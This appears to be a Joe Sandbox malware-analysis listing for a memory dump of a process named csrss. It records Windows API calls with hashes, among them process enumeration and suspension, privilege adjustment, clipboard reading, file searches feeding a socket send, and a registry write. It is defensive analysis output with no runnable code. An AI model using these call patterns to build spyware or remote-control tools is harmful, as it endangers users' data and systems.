                                                      • Opcode Fuzzy Hash: 29d18a31a9c5dc9ad18af58bc9a40c416a579766ac18fa77714bb489c60fd35b
                                                      • Instruction Fuzzy Hash: 1E51BC77D00319EFDB00DFB9CC809AEB7FCEF44761B54065AD595AB680E730A9428BA4
                                                      APIs
                                                        • Part of subcall function 33D5BFB7: GetCurrentProcess.KERNEL32(?,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFC8
                                                        • Part of subcall function 33D5BFB7: IsWow64Process.KERNEL32(00000000,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFCF
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 33D4F91B
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 33D4F93F
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 33D4F94E
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D4FB05
                                                        • Part of subcall function 33D5BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,33D4F5F9,00000000,?,?,33DB5338), ref: 33D5BFFA
                                                        • Part of subcall function 33D5BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,33DB5338), ref: 33D5C005
                                                        • Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 33D5C1F5
                                                        • Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 33D5C208
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 33D4FAF6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 2180151492-0
                                                      • Opcode ID: d950c15fcf8b5c62db270a37fd39af0306c79c7fd8eb93d1ab487b6600f7281e
                                                      • Instruction ID: 14007094cda6a940534a79455b0093fa631651ee3a8b98f07441c1bb5043f362
                                                      • Opcode Fuzzy Hash: d950c15fcf8b5c62db270a37fd39af0306c79c7fd8eb93d1ab487b6600f7281e
                                                      • Instruction Fuzzy Hash: 274114329083859BD325EB62DC50AFFB3E9BF94300F50492DE58B96591EF305A4BC762
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,33DA6C64,00000000), ref: 33D4C39B
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 33D4C46E
                                                      • FindClose.KERNEL32(00000000), ref: 33D4C47D
                                                      • FindClose.KERNEL32(00000000), ref: 33D4C4A8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFile$FirstNext
                                                      • String ID:
                                                      • API String ID: 1164774033-0
                                                      • Opcode ID: 9b0540f1e9eacbd929f62739c05c323810b066d2a4e6ce1d01278eb5b8ab187e
                                                      • Instruction ID: 7a10dad61809591dc39e1b5208a331f3063d3c7f97377e289b16ac27a892a326
                                                      • Opcode Fuzzy Hash: 9b0540f1e9eacbd929f62739c05c323810b066d2a4e6ce1d01278eb5b8ab187e
                                                      • Instruction Fuzzy Hash: DF318732D0431AAADB14EBB5DD98DFDB77DAF10610F400159E10AA34C1FF74AA8ECA64
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 33D5795F
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 33D57966
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,33DAC7C8,?), ref: 33D57978
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 33D57997
                                                      • GetLastError.KERNEL32 ref: 33D5799D
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                      • String ID:
                                                      • API String ID: 3534403312-0
                                                      • Opcode ID: 45dab1bd5f053ee36c20c395c3b477b2ebbdf5780e6d8c62ff332b7dec40fa79
                                                      • Instruction ID: e0dc20fa9323dd10f4adda9a81bf8ea9887398bce31bf6eefebf4d0f9ad37799
                                                      • Opcode Fuzzy Hash: 45dab1bd5f053ee36c20c395c3b477b2ebbdf5780e6d8c62ff332b7dec40fa79
                                                      • Instruction Fuzzy Hash: 5DF012B2802129ABEB10ABA4CD4DAEFBFFCEF05215F010050B80AE2040D6344A15CAA1
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,33D84A73,?,?,?,?,33D844CA,?,00000004), ref: 33D91DBA
                                                      • _wcschr.LIBVCRUNTIME ref: 33D91E4A
                                                      • _wcschr.LIBVCRUNTIME ref: 33D91E58
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,33D84A73,00000000,33D84B93), ref: 33D91EFB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                      • String ID:
                                                      • API String ID: 4212172061-0
                                                      • Opcode ID: b6bbf4c923474afebe48ae875db2dea5dd3f45580a6ab29148a9efa51f2697ec
                                                      • Instruction ID: 955558e54309daaa1629685c1306fd7da03cc9bd9d06df23429343409b6e2dbd
                                                      • Opcode Fuzzy Hash: b6bbf4c923474afebe48ae875db2dea5dd3f45580a6ab29148a9efa51f2697ec
                                                      • Instruction Fuzzy Hash: AE61F4BAA00706AAF7159F74CC81BFB73ACEF04750F14056AE949DB980EB70E9018770
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 33D496E2
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 33D4970B
                                                      • FindClose.KERNEL32(?), ref: 33D49722
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 7a03b93a8fc8a96ed9dfdad14d09a06fb29fd1266462e0de03f59495d3a1d41f
                                                      • Instruction ID: 6ddc51dad1cb8d745f14aec7103433157c9621e4b5d99fe1124409afda3d46fa
                                                      • Opcode Fuzzy Hash: 7a03b93a8fc8a96ed9dfdad14d09a06fb29fd1266462e0de03f59495d3a1d41f
                                                      • Instruction Fuzzy Hash: 34814E72C043199BCB15DFA2DC90DEDB7B8BF14210F54426AE516A7495FF30AB4ACBA0
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D74A06
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 33D74ACE
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 33D74AED
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 33D74AF7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 8a3826ad6b2ea8ad70948c57d0850e3b01c1eea0d02829d35124a8692bdf607b
                                                      • Instruction ID: 827ddadae5a073193b56797aee10d61f1c979325794ea6e774a6e145117b8302
                                                      • Opcode Fuzzy Hash: 8a3826ad6b2ea8ad70948c57d0850e3b01c1eea0d02829d35124a8692bdf607b
                                                      • Instruction Fuzzy Hash: FA3118B6D0222C9BDB20DFA5D9896CDBBF8FF08345F1041AAE40DA7240E7309A85CF55
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D74A06
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 33D74ACE
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 33D74AED
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 33D74AF7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 7d7f0a932a29e5356213b12092509e082ff8bee4b81043cf391d323f64d7f7e1
                                                      • Instruction ID: 00555a22d2c3560f49690a830854ba66438718e701933cb72f2b18534a7eb93c
                                                      • Opcode Fuzzy Hash: 7d7f0a932a29e5356213b12092509e082ff8bee4b81043cf391d323f64d7f7e1
                                                      • Instruction Fuzzy Hash: 9A3107B6D0222C9BDB20DFA5D9896CDBBF8FF08345F1041AAE40DA7240EB314A85CF51
                                                      APIs
                                                      • FindResourceA.KERNEL32(33DACA14,0000000A,00000000), ref: 33D5B4B9
                                                      • LoadResource.KERNEL32(00000000,?,?,33D4F3DE,00000000), ref: 33D5B4CD
                                                      • LockResource.KERNEL32(00000000,?,?,33D4F3DE,00000000), ref: 33D5B4D4
                                                      • SizeofResource.KERNEL32(00000000,?,?,33D4F3DE,00000000), ref: 33D5B4E3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLockSizeof
                                                      • String ID:
                                                      • API String ID: 3473537107-0
                                                      • Opcode ID: e7c1fd18a25f8d7428c8119a564dff62f77c9eafa38e18ccf26031383438e220
                                                      • Instruction ID: cca9bc47fa508431294b90ac28cd9e4e9a30d951324af0e556448239c2d40f5f
                                                      • Opcode Fuzzy Hash: e7c1fd18a25f8d7428c8119a564dff62f77c9eafa38e18ccf26031383438e220
                                                      • Instruction Fuzzy Hash: 3DE01A77200210EBDB213BB5CC4CD463FA9F7C9BA33000465F512B7221DA328406DBA0
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,33DA6608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 33D488CA
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 33D488FF
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 33D48A15
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: ab937bd930308e850c2806b3f8e9d5d091c9845e74306ced24e70a086022c48c
                                                      • Instruction ID: a9c9d98116ad11c71d59e57eadde2151deba53ff829cc46f36f59c91dbf666ec
                                                      • Opcode Fuzzy Hash: ab937bd930308e850c2806b3f8e9d5d091c9845e74306ced24e70a086022c48c
                                                      • Instruction Fuzzy Hash: 7D519F72C01309AACF04FFB5DD959ED7BB8AF10251F900159E81AA7891FF349B49CBA1
                                                      APIs
                                                      • ExitWindowsEx.USER32(00000000), ref: 33D56856
                                                      • LoadLibraryA.KERNEL32(33DAC770), ref: 33D5686B
                                                      • GetProcAddress.KERNEL32(00000000), ref: 33D56872
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: AddressExitLibraryLoadProcWindows
                                                      • String ID:
                                                      • API String ID: 1366546845-0
                                                      • Opcode ID: f7fae72ec85971c7afd66bc01392b3f8641cf2aedeb09f383659a13047cf08b0
                                                      • Instruction ID: 85d56b8ded39d6e25b6bd9aed338f1ba55b1124a85dab73ef0a62c5074298e53
                                                      • Opcode Fuzzy Hash: f7fae72ec85971c7afd66bc01392b3f8641cf2aedeb09f383659a13047cf08b0
                                                      • Instruction Fuzzy Hash: 0C2195B5F443059BEE14FFB5C854AAE27995F91640F84486DB08297AC1EF64C80DC371
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 33D7BC1A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 33D7BC24
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 33D7BC31
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 90ebafd35c30e3325d52842c460076dbb4aa993f8e956f35419726da89e877d2
                                                      • Instruction ID: 8481dcd077993303f353e9ce8fbfb634ea3a883be152038f74753197416bd331
                                                      • Opcode Fuzzy Hash: 90ebafd35c30e3325d52842c460076dbb4aa993f8e956f35419726da89e877d2
                                                      • Instruction Fuzzy Hash: E531C475D0131D9BCB21DF64D988B9DBBB8BF08710F5041EAE41CA7250EB309B818F55
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002,00000000,?,33D86136,00000003), ref: 33D832D6
                                                      • TerminateProcess.KERNEL32(00000000,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002,00000000,?,33D86136,00000003), ref: 33D832DD
                                                      • ExitProcess.KERNEL32 ref: 33D832EF
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 0f445ff9240dbf08596cbbf2e5bfd7c1d0351243f0f057c08be99ee618803641
                                                      • Instruction ID: 5469b8479955b3a0a585a12692917dbfb2c7f8371f49ca4f3a125094a2ec9ac8
                                                      • Opcode Fuzzy Hash: 0f445ff9240dbf08596cbbf2e5bfd7c1d0351243f0f057c08be99ee618803641
                                                      • Instruction Fuzzy Hash: 0EE0EC76801248EFCF426F64C909A983BA9FF41782F444114F90E9E931CB36EE52CB90
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,33D55FFF), ref: 33D5BB14
                                                      • NtSuspendProcess.NTDLL(00000000), ref: 33D5BB21
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5BB2A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseHandleOpenSuspend
                                                      • String ID:
                                                      • API String ID: 1999457699-0
                                                      • Opcode ID: db888e9062932826b2e53746eee0d9428d8340a13c5561e3c2d505e683bdce2c
                                                      • Instruction ID: 7776f36679f039fe89daf57a0b21ab0d8f90c7124bdb0e45bce6c1fdcaf6a42d
                                                      • Opcode Fuzzy Hash: db888e9062932826b2e53746eee0d9428d8340a13c5561e3c2d505e683bdce2c
                                                      • Instruction Fuzzy Hash: 59D0A737600031A3CB212BAAAC0CE57BEBCEFC5DA17060119F505E31049A708802C6F0
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,33D56024), ref: 33D5BB40
                                                      • NtResumeProcess.NTDLL(00000000), ref: 33D5BB4D
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5BB56
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseHandleOpenResume
                                                      • String ID:
                                                      • API String ID: 3614150671-0
                                                      • Opcode ID: 3e4023ff24d1f6d5bcb7a10b958d18024bddd3bca34c8278baa399342bab7331
                                                      • Instruction ID: 468cc68b7a195c1a9f5d331cc8000c51323fa78b005db1d016f797a0c467630b
                                                      • Opcode Fuzzy Hash: 3e4023ff24d1f6d5bcb7a10b958d18024bddd3bca34c8278baa399342bab7331
                                                      • Instruction Fuzzy Hash: 25D0C73B605131A7C721376AAC1CD57AFBDEFD5DA27064119F505E3244AA708802C6F1
                                                      APIs
                                                      • OpenClipboard.USER32(00000000), ref: 33D4B711
                                                      • GetClipboardData.USER32(0000000D), ref: 33D4B71D
                                                      • CloseClipboard.USER32 ref: 33D4B725
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$CloseDataOpen
                                                      • String ID:
                                                      • API String ID: 2058664381-0
                                                      • Opcode ID: e860491a94fe36a7ab4ee96468a142ee62fa07f01d273739afd15f7a498e437b
                                                      • Instruction ID: 0c96af363cb6b65b39487eb08ee23d4f2715dc457f39b37bc3f705f7371123f1
                                                      • Opcode Fuzzy Hash: e860491a94fe36a7ab4ee96468a142ee62fa07f01d273739afd15f7a498e437b
                                                      • Instruction Fuzzy Hash: 94E0C236A46320AFD710BF60CD48B8A77909F78F91F408018B58AAA280CF708840C670
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 33D59D4B
                                                        • Part of subcall function 33D5C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$CreateFindFirst
                                                      • String ID: H#z
                                                      • API String ID: 41799849-2410801705
                                                      • Opcode ID: 79cc14a80123374264cf3ed7050354fa648de42d4ca8ab325b3e47020a0ace4b
                                                      • Instruction ID: efd93d7951ba4b017713470056aa5f9dd48514804b4714a5c8e260fd49ca9354
                                                      • Opcode Fuzzy Hash: 79cc14a80123374264cf3ed7050354fa648de42d4ca8ab325b3e47020a0ace4b
                                                      • Instruction Fuzzy Hash: D78184329483409BD714EB32CC50EEFB7A9AFA0250F80492DF597539D1EF309A4AC762
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 33D74C6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-3916222277
                                                      • Opcode ID: c5e5794c52fbd7007340951b70aacc40b7a89344ac5264be298e0dede921321c
                                                      • Instruction ID: 984bd5b0906245f9b06ab0ef29d4cfd95ba6d61d9e92778f5f2bf992c117c05c
                                                      • Opcode Fuzzy Hash: c5e5794c52fbd7007340951b70aacc40b7a89344ac5264be298e0dede921321c
                                                      • Instruction Fuzzy Hash: 0C518CB6D00208DBEB05CF66C48169EBBF4FF08350F65846ED895EB244E3349A51CFA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-248832578
                                                      • Opcode ID: 3d01253d2080a79ced6e1ad3291c0a3a8416a9c5297687d6e321cbf93b4d25f2
                                                      • Instruction ID: 8888cc9fef12e3c1b72ec227c880f33dca4ef1b5b84604f8b980d597c9aba988
                                                      • Opcode Fuzzy Hash: 3d01253d2080a79ced6e1ad3291c0a3a8416a9c5297687d6e321cbf93b4d25f2
                                                      • Instruction Fuzzy Hash: 5F315CB6800209AFDB14DF39CC84EEE7BBDEF85704F04019CE458DB261E670A9458FA0
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 33D5CAD7
                                                        • Part of subcall function 33D5376F: RegCreateKeyA.ADVAPI32(80000001,00000000,33DA74AC), ref: 33D5377E
                                                        • Part of subcall function 33D5376F: RegSetValueExA.KERNEL32(33DA74AC,33DA74B8,00000000,?,00000000,00000000,33DB52F0,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537A6
                                                        • Part of subcall function 33D5376F: RegCloseKey.ADVAPI32(33DA74AC,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateInfoParametersSystemValue
                                                      • String ID: Control Panel\Desktop
                                                      • API String ID: 4127273184-27424756
                                                      • Opcode ID: db77911f2f80ace8110833518f13f3e0bd2077e679e38bb1354efcd15d210d9d
                                                      • Instruction ID: 9899593b55380ba50ad5aeb59ba531f87b643b6037ca9f09a38c43d9bdd2892a
                                                      • Opcode Fuzzy Hash: db77911f2f80ace8110833518f13f3e0bd2077e679e38bb1354efcd15d210d9d
                                                      • Instruction Fuzzy Hash: A6117F62F81200B7FC15713D8E27F6E2D86A346A60F840199F5627BAC6E9C30A5946E3
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,33D844CA,?,00000004), ref: 33D88940
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2299586839-2904428671
                                                      • Opcode ID: f6a79ecafc7c7cd60e05106f1c8c19a7f9546bb47860dadc52e81ab487320e30
                                                      • Instruction ID: 65bb943d3acd86060b578001664a81c147c96517034026498e96b4868249fc99
                                                      • Opcode Fuzzy Hash: f6a79ecafc7c7cd60e05106f1c8c19a7f9546bb47860dadc52e81ab487320e30
                                                      • Instruction Fuzzy Hash: CBF09672901208FBDB01AF70DD04EAE7B65DF04652F004555FC057A150DA7169269AD5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 59dafb57e5b7b13d3bd24c2dac195c6547dac3f36cdd53fec792f45fd62dfc08
                                                      • Instruction ID: bc380f1cb4dc180e81be73f7b6472f72be50f5860b546206be95a6b9fa74c459
                                                      • Opcode Fuzzy Hash: 59dafb57e5b7b13d3bd24c2dac195c6547dac3f36cdd53fec792f45fd62dfc08
                                                      • Instruction Fuzzy Hash: 4D026D71E012199FDF14CFA9C88069DB7F5FF48724F1942A9D919EB384D730AA01CB90
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 33D47857
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 33D4791F
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: FileFind$FirstNextsend
                                                      • String ID:
                                                      • API String ID: 4113138495-0
                                                      • Opcode ID: 51f55094468c4f9b3814a210b9b3651babb35caaf7076b9d00a173a66e58b0b7
                                                      • Instruction ID: f2a169bda094f4b6df94077992743f2189aa5943773d57fd541dcb12030c29fe
                                                      • Opcode Fuzzy Hash: 51f55094468c4f9b3814a210b9b3651babb35caaf7076b9d00a173a66e58b0b7
                                                      • Instruction Fuzzy Hash: 7C21BD329083459BC714EBA1DC94DEFB7ACAF94314F80091DF59652891FF309A0ECAA2
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 33D520E7
                                                      • HeapFree.KERNEL32(00000000), ref: 33D520EE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: ac4a61e3bc4b0059b77a8e6ac75ce8cbb0da19b62caf5e857593b4c199d12b3d
                                                      • Instruction ID: 268a32c30b1ad2e697b7cf24ec9fd14e5f0e5b1bdd117b93f93c867ffa67cba3
                                                      • Opcode Fuzzy Hash: ac4a61e3bc4b0059b77a8e6ac75ce8cbb0da19b62caf5e857593b4c199d12b3d
                                                      • Instruction Fuzzy Hash: 4F112772401B11EFEB309F68CD84817BBEAFF04B61744882DF19656821CB32F8A0CB10
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,33D93326,?,?,00000008,?,?,33D961DD,00000000), ref: 33D93558
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: e0774ad973aa10d8f5670b939e023c5d8cf0cb5a9390495d9af7946191dc948d
                                                      • Instruction ID: 2f6d3295df5a26a2a629108c8cc69ddf4985c64e3789774245761a5d67f69383
                                                      • Opcode Fuzzy Hash: e0774ad973aa10d8f5670b939e023c5d8cf0cb5a9390495d9af7946191dc948d
                                                      • Instruction Fuzzy Hash: 62B16A75610608DFE706CF28C486B957BE0FF09364F698698E8DACF6A1C735E991CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
